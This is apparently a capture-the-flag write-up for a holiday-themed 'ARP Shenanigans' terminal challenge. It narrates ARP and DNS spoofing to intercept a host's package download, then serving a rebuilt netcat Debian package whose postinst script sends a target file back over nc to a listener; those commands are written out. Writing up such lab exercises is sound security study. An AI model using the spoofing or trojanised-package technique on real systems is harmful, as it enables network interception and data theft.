In the NetWars roof beside Alabaster Snowball is a terminal titled ARP Shenanigans.
Talking with Alabster, he states we need to do a man-in-the-middle attack on a host compromised by Jack Frost and read the contents of a file on the file system.
Doing a quick tcpdump with tcpdump -nne -vv shows the host 10.6.6.35 repeatedly doing an arp call for 10.6.6.53.
Looking in ~/scripts shows python scripts for spoofing ARP (~/scripts/arp_resp.py) and spoofing a DNS query response (~/scripts/dns_resp.py).
First order of business is modifying these scripts with appropriate values so that they correctly spoof the ARP and DNS query.
The help mentions using python to run a webserver, so I fired that up next using python3 -m http.server 80.
This showed the remote host repeatedly trying to download the file /pub/jfrost/backdoor/suriv_amd64.deb.
The directory ~/debs has multiple debian packages, including netcat. What if we modified this package to open a netcat connection after install and pipe the file back to a listening netcat on our side?
First I created a directory for the extracted package by running mkdir -p ~/debs/netcat.
I then extracted the netcat package to the new dir by running dpkg-deb -R ~/debs/netcat-traditional_1.10-41.1ubuntu1_amd64.deb ~/debs/netcat.
To the postinst script I added commands to cat the requested file to a netcat back to this server by running cat << EOF >> ~/debs/netcat/DEBIAN/postinst
cat /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt | nc `hostname -I` 4444
I then rebuilt the package into the file that the remote host is trying to download with dpkg-deb -b ~/debs/netcat ~/debs/suriv_amd64.deb.
To cover the path requested for the file, I created some subdirs and a sym link with mkdir -p ~/pub/jfrost
ln -s ~/debs ~/pub/jfrost/backdoor.
I then started up the HTTP server with python3 -m http.server 80.
In a different tmux pane, I started up netcat listening on a port with redirecting any output to a file using nc -lvp 4444 > ~/NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt
In another pane I then started the arp_resp.py and dns_resp.py scripts in an infinite loop.
The chain began. The arp request was spoofed, then the dns request. The remote host connected to the web server and downloaded the file. During the post install, the package made a connection back to this host and cat the file.
Reading the file that was collected shows who recused themselves in the vote..
An overview of all people, places, and events can be learned in the Introduction.